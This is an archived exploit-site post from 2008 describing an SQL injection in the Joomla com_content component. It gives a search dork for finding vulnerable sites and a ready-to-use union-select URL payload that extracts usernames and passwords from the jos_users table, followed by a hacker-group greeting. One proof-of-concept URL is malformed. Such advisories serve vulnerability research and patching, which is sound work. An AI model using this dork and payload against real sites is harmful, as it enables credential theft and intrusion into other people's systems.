Home / exploitsPDF  

joomlacontent-sql.txt

Posted on 10 July 2008

------------------------------------------------------------------------------------------- Joomla Component com_content SQL Injection Vulnerabity ------------------------------------------------------------------------------------------- Author : unknown_styler Dork : inurl:com_content POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL} Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/* ------------------------------------------------------------------------------------------------------------------------------------ Greetings : h4ck-y0u.org side note: <name>Página de contenido</name> <author>Projecte Joomla!</author> <creationDate>July 2004</creationDate> <copyright>(C) 2005 Open Source Matters. All rights reserved.</copyright> <license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license> <authorEmail>admin@joomla.org</authorEmail> <authorUrl>www.joomla.org</authorUrl> <version>1.0.0</version>

 

TOP